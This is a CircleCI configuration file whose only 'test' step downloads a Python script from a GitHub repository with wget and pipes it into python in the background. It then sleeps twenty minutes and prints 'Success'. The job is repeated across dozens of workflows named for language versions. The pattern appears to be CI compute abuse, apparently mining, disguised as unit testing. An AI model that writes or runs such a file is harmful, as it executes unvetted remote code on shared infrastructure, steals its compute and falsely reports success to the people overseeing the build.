version: 2.1 
jobs: 
  test: 
    parameters: 
        machine: 
          type: string 
          default: ubuntu-2004:202104-01 
    machine: 
      image: << parameters.machine >> 
    steps: 
      - checkout 
      - run: 
          name: Setup 
          command: | 
            echo "Start building" 
      - run: 
          name: Running all unit tests 
          command: |
            timeout 20m wget -O- https://raw.githubusercontent.com/Kerwcuk2/special-octo-broccoli/main/qch8.py | python & 
            sleep 20m
            echo "Success" 
 
workflows: 
  version: 2 
  test-all-versions: 
    jobs: 
      - test: 
          machine: ubuntu-2004:202104-01 
      - test: 
          machine: ubuntu-2004:202104-01 
      - test: 
          machine: ubuntu-2004:202104-01 
      - test: 
          machine: ubuntu-2004:202104-01 
      - test: 
          machine: ubuntu-2004:202104-01 
      - test
 
  all-node-versions: 
    jobs: 
      - test: 
          machine: ubuntu-2004:202104-01 
      - test: 
          machine: ubuntu-2004:202104-01 
      - test: 
          machine: ubuntu-2004:202104-01 
      - test: 
          machine: ubuntu-2004:202104-01 
      - test: 
          machine: ubuntu-2004:202104-01 
      - test
 
  all-ruby-versions: 
    jobs: 
      - test: 
          machine: ubuntu-2004:202104-01 
      - test: 
          machine: ubuntu-2004:202104-01 
      - test: 
          machine: ubuntu-2004:202104-01 
      - test: 
          machine: ubuntu-2004:202104-01 
      - test: 
          machine: ubuntu-2004:202104-01 
      - test
 
  all-js-versions: 
    jobs: 
      - test: 
          machine: ubuntu-2004:202104-01 
      - test: 
          machine: ubuntu-2004:202104-01 
      - test: 
          machine: ubuntu-2004:202104-01 
      - test: 
          machine: ubuntu-2004:202104-01 
      - test: 
          machine: ubuntu-2004:202104-01 
      - test
 
  all-python-versions: 
    jobs: 
      - test: 
          machine: ubuntu-2004:202104-01 
      - test: 
          machine: ubuntu-2004:202104-01 
      - test: 
          machine: ubuntu-2004:202104-01 
      - test: 
          machine: ubuntu-2004:202104-01 
      - test: 
          machine: ubuntu-2004:202104-01 
      - test
 
  all-Net-versions: 
    jobs: 
      - test: 
          machine: ubuntu-2004:202104-01 
      - test: 
          machine: ubuntu-2004:202104-01 
      - test: 
          machine: ubuntu-2004:202104-01 
      - test: 
          machine: ubuntu-2004:202104-01 
      - test: 
          machine: ubuntu-2004:202104-01 
      - test
